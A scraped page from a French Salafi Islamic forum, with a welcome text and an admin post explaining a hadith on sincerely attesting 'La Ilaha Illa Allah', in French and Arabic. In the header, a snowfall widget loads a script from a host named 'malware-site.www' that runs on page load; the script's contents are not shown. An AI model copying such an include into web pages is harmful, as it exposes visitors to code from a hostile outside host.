ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Juillet 2017

LunMarMerJeuVenSamDim
     12
3456789
10111213141516
17181920212223
24252627282930
31      

Calendrier Calendrier

anipassion.com

    celui qui atteste de la illaha ila Allah de maniere veridique rentre au paradis

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    celui qui atteste de la illaha ila Allah de maniere veridique rentre au paradis

    Message par assalafia le Sam 17 Mai - 15:23

    Surprised 

    Celui qui atteste de La Ilaha Illa Allah de manière véridique entre au paradis
     
    Au nom d'Allah, le Tout Miséricordieux, le Très Miséricordieux.

    D'après Abou Moussa Al Ach'ari (qu'Allah l'agrée), je suis allé voir le Prophète (que la prière d'Allah et son salut soient sur lui) et il y avait avec moi un groupe de mon peuple, il a dit: « Je vous annonce la bonne nouvelle et annoncez la à ceux que vous avez laissé derrière vous, celui qui atteste de -La Ilaha Illa Allah- de manière véridique entre au paradis ».
    Nous sommes ensuite sortis de chez le Prophète (que la prière d'Allah et son salut soient sur lui) et avons annoncé la bonne nouvelle aux gens et alors nous avons fait face à 'Omar Ibn Al Khattab (qu'Allah l'agrée) qui nous a fait retourner vers le Prophète (que la prière d'Allah et son salut soient sur lui).
    Le Prophète (que la prière d'Allah et son salut soient sur lui) nous a dit: « Qui vous a fait revenir ? ».
    Nous avons dit: 'Omar (qu'Allah l'agrée).
    Le Prophète (que la prière d'Allah et son salut soient sur lui) lui demanda: « Pourquoi les as-tu fait revenir ? ».
    'Omar (qu'Allah l'agrée) a dit: Ainsi les gens vont s'accrocher uniquement à cela.
    Alors le Prophète (que la prière d'Allah et son salut soient sur lui) s'est tu.
    (Rapporté par Ahmed et authentifié par Cheikh Albani dans la Silsila Sahiha n°712)

    Ce hadith nous montre le grand mérite de la parole -La Ilaha Illa Allah- mais il nous montre également que le fait de la prononcer uniquement avec la langue sans comprendre son sens et sans avoir complété ses conditions ne va pas profiter à celui qui l'a prononcé de cette manière dans l'au-delà.

    L'imam 'Abder Rahman Ibn Hassan Al Cheikh (mort en 1285) a dit dans Fath Al Majid p 44: « Celui qui atteste de -La Ilaha Illa Allah- est celui qui prononce cette parole en connaissant son sens et en agissant par ce qu'elle induit que se soit dans son for intérieur comme dans ses actes extérieurs. Ainsi il faut forcément pour les deux attestations de foi la science, la certitude et agir par ce qu'elles induisent comme Allah a dit: -Sache qu'il n'y a pas d'autre divinité qui mérite d'être adorée par justice si ce n'est Allah- [Sourate Muhammad verset 19] et il a dit également: -Sauf ceux qui attestent de la vérité alors qu'ils savent- [Sourate Zoukhrouf n°43 verset 86].
    Par contre le fait de prononcer cette parole sans comprendre son sens, sans en avoir la certitude et sans mettre en pratique ce qu'elle induit comme désaveux de l'association, comme sincérité dans les paroles et les actes (la parole du coeur et de la langue et les actes du coeur et des membres) alors ceci ne profite en rien par consensus ».

    [size=32]
    عن أبي موسى الأشعري رضي الله عنه قال : أتيت النبي صلى الله عليه وسلم و معي نفر من قومي فقال : أبشروا و بشروا من وراءكم أنه من شهد أن لا إله إلا الله صادقا دخل الجنة
    فخرجنا من عند النبي صلى الله عليه وسلم نبشر الناس فاستقبلنا عمر بن الخطاب رضي الله عنه . فرجع بنا إلى رسول الله صلى الله
    عليه وسلم فقال رسول الله صلى الله عليه وسلم : من ردكم ؟
    قالوا : عمر رضي الله عنه
    قال النبي صلى الله عليه وسلم : لم رددتهم يا عمر؟
    فقال عمر رضي الله عنه : إذا يتكل الناس
    فسكت رسول الله صلى الله عليه وسلم
    (رواه أحمد و صححه الشيخ الألباني في السلسلة الصحيحة رقم ٧١٢)
    [/size]
     
     



     

      La date/heure actuelle est Lun 24 Juil - 17:33